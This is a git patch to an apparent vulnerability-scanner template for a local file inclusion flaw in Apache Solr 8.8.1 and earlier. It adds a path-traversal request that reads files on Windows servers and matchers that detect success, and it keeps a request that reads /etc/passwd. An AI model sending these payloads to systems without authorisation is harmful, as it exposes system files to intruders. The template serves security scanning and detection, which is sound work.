From 843264155b58ddf47485d8d5f7fb8d9ba5e5cd3b Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 1 Dec 2022 18:51:21 -0500 Subject: [PATCH] Update apache-solr-file-read.yaml 1. The added GET request triggers a file local read on Windows OS. 2. Matcher added to the Response trigger by 1. 3. Matcher for other cases (Errors, ie. not found path) --- .../apache/apache-solr-file-read.yaml | 27 ++++++++++++++----- 1 file changed, 20 insertions(+), 7 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index ccb3629709..6ccddb4c27 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -2,7 +2,7 @@ id: apache-solr-file-read info: name: Apache Solr <= 8.8.1 - Local File Inclusion - author: DhiyaneshDk + author: DhiyaneshDk, philippedelteil severity: high description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion. reference: @@ -22,6 +22,12 @@ requests: Host: {{Hostname}} Accept-Language: en Connection: close + + - | + GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../¶m=ContentStream HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close - | GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 @@ -37,14 +43,21 @@ requests: regex: - '"name"\:"(.*?)"' - matchers-condition: and matchers: - - type: status - status: - - 200 - + - type: word + name: "Windows" + words: + - "Windows" + - "Users" + - "org.apache.solr.handler.DumpRequestHandler" + condition: and - type: regex + name: "Linux" regex: - "root:.*:0:0:" - + - type: word + name: "Other" + words: + - "java.io.FileNotFoundException" + # Enhanced by mp on 2022/07/22